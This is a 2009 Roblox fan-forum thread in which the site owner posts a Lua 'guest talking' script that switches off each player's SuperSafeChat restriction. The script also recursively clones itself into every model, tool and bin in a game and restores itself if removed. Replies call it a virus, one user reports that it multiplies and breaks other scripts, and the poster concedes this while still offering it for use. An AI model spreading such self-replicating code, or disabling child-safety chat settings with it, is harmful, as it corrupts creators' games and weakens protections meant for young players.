Chaddster/Scibby HQ
Ello HQ member hows your day? Ready to get on and do forums and have some fun! -Chaddster and the team
Chaddster/Scibby HQ
Ello HQ member hows your day? Ready to get on and do forums and have some fun! -Chaddster and the team
Chaddster/Scibby HQ
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Chaddster/Scibby HQ

Over 400 members on ROBLOX
 
HomeHome  PortalPortal  GalleryGallery  Latest imagesLatest images  SearchSearch  RegisterRegister  Log inLog in  
If you like to see the lastest videos Chaddster and bjb82 make Click here https://www.youtube.com/user/bjb20.
Check out the LASTEST Contest! HERE.
We are making a test server so we can see what members think. You'll have to make a account on the site.
Updates
Free Games
- A FREE Virtual World-Building Game with Avatar Chat, 3D Environments, and Physics
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password

 

 Guest Talking Script

Go down 
+2
brandon36324
Chaddster
6 posters
AuthorMessage
Chaddster
Site Owner
Site Owner
Chaddster


Posts : 261
Join date : 2009-04-29
Location : You know that house on the street.
Age : 27

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue1000000000000000/1000000000000000Guest Talking Script Empty_bar_bleue  (1000000000000000/1000000000000000)

Guest Talking Script Empty
PostSubject: Guest Talking Script   Guest Talking Script EmptySat Jul 25, 2009 12:40 pm

if (script.Parent == workspace) then
function checkForAndSwitch(player)
if (player.SuperSafeChat == true) then
player.SuperSafeChat = false;
wait(5);
local m = Instance.new("Message");
m.Text = "Press the / key to start typing.";
m.Parent = player;
wait(5);
m.Text = "Then press Enter to send your message.";
wait(5);
m:Remove();
m = nil;
end
player = nil;
collectgarbage("collect");
end
function onChildAddedToPlayers(obj)
if (obj.className == "Player") then
checkForAndSwitch(obj);
local m = Instance.new("Message");
m.Text = "This Server Supports Talking Guests";
m.Parent = obj;
wait(5);
m:Remove();
m = nil;
end
obj = nil;
collectgarbage("collect");
end
function onChildAddedToWorkspace(obj)
if (obj.className == "Model") then
if (game.Players:playerFromCharacter(obj) ~= nil) then
checkForAndSwitch(game.Players:playerFromCharacter(obj));
end
end
obj = nil;
collectgarbage("collect");
end
function findLowestLevel(obj)
local c = obj:GetChildren();
local lowestLevel = true;
for i, v in pairs(c) do
if (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
lowestLevel = false;
wait();
findLowestLevel(v);
end
end
if (obj ~= workspace and lowestLevel == true and (obj:FindFirstChild(script.Name) == nil)) then
if (obj ~= game.Lighting and obj ~= game.StarterPack) then
local s = script:Clone();
s.Parent = obj;
end
end
end
findLowestLevel(game);
game.Players.ChildAdded:connect(onChildAddedToPlayers);
game.Workspace.ChildAdded:connect(onChildAddedToWorkspace);
else
local findScript = workspace:FindFirstChild(script.Name);
if (findScript == nil) then
local s = script:Clone();
s.Parent = workspace;
end
end
--[[function findAllCopies(obj)
local c = obj:GetChildren();
for i, v in pairs(c) do
if (v.Name == script.Name and v.className == "Script" and v ~= script) then
v.Parent = nil;
elseif (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
findAllCopies(v);
end
end
end
findAllCopies(game);
script.Parent = nil;]]
Back to top Go down
https://chaddster-scibbyhq.forumotion.com
brandon36324
Image Moderator
Image Moderator
brandon36324


Posts : 113
Join date : 2009-05-02
Location : rawrville
Age : 26

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue0/0Guest Talking Script Empty_bar_bleue  (0/0)

Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script EmptySat Jul 25, 2009 4:40 pm

really wow its long
Back to top Go down
jordan4762
Newbie
Newbie
jordan4762


Posts : 7
Join date : 2009-05-25
Location : [Content Deleted]

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue0/0Guest Talking Script Empty_bar_bleue  (0/0)

Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script EmptyTue Aug 18, 2009 10:27 am

Thats Becuz Its A Virus
Back to top Go down
jordan4762
Newbie
Newbie
jordan4762


Posts : 7
Join date : 2009-05-25
Location : [Content Deleted]

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue0/0Guest Talking Script Empty_bar_bleue  (0/0)

Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script EmptyTue Aug 18, 2009 10:28 am

No Offence Its A GOOD Virus Very Happy
Back to top Go down
brandon36324
Image Moderator
Image Moderator
brandon36324


Posts : 113
Join date : 2009-05-02
Location : rawrville
Age : 26

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue0/0Guest Talking Script Empty_bar_bleue  (0/0)

Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script EmptyTue Aug 18, 2009 3:24 pm

offensive
Back to top Go down
Chaddster
Site Owner
Site Owner
Chaddster


Posts : 261
Join date : 2009-04-29
Location : You know that house on the street.
Age : 27

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue1000000000000000/1000000000000000Guest Talking Script Empty_bar_bleue  (1000000000000000/1000000000000000)

Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script EmptyTue Aug 18, 2009 8:59 pm

It is but, it does let guest talk.
Back to top Go down
https://chaddster-scibbyhq.forumotion.com
Perfectlystrange
Little Famous ROBLOXIAN
Little Famous ROBLOXIAN
Perfectlystrange


Posts : 120
Join date : 2009-07-19
Location : [Content Deleted]
Age : 29

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue0/0Guest Talking Script Empty_bar_bleue  (0/0)

Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script EmptyTue Aug 18, 2009 9:20 pm

well.... with all the guest talk stuff i tried it on my places..... nothing in it, and it STILL wouldent let me talk.
Back to top Go down
http://gothicsk8ter-robloxrocks2.blogspot.com/?zx=35429f9513c8fd
mightycook
Famous ROBLOXIAN
Famous ROBLOXIAN
mightycook


Posts : 171
Join date : 2009-10-26
Location : [Content Deleted]

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue0/0Guest Talking Script Empty_bar_bleue  (0/0)

Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script EmptyMon Oct 26, 2009 5:15 pm

i dont want guests to talk
Back to top Go down
mightycook
Famous ROBLOXIAN
Famous ROBLOXIAN
mightycook


Posts : 171
Join date : 2009-10-26
Location : [Content Deleted]

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue0/0Guest Talking Script Empty_bar_bleue  (0/0)

Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script EmptyMon Oct 26, 2009 5:16 pm

its fine if they do but hey can be annoying
Back to top Go down
jamber250
Newbie
Newbie
jamber250


Posts : 2
Join date : 2009-10-01
Location : Columbus, OH
Age : 25

Character sheet
Website Rating:
Guest Talking Script Left_bar_bleue0/0Guest Talking Script Empty_bar_bleue  (0/0)

Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script EmptyMon Oct 26, 2009 8:28 pm

Its a virus and it helps, bad thing is it IS a virus. The Uhhh script muliplys and it makes my other scripts not work.

Thats why i Invented my Own Virus Protection Script. It Fully protects your place from viruses and any new viruses. It wipes it out 100%.

It also has some other good stuff. It tells the server Status.

I like it. Called Virus-B-Gone.
Back to top Go down
Sponsored content





Guest Talking Script Empty
PostSubject: Re: Guest Talking Script   Guest Talking Script Empty

Back to top Go down
 
Guest Talking Script
Back to top 
Page 1 of 1
 Similar topics
-
» A nice script for shout button

Permissions in this forum:You cannot reply to topics in this forum
Chaddster/Scibby HQ :: Roblox/HQ help :: Scripting?-
Jump to: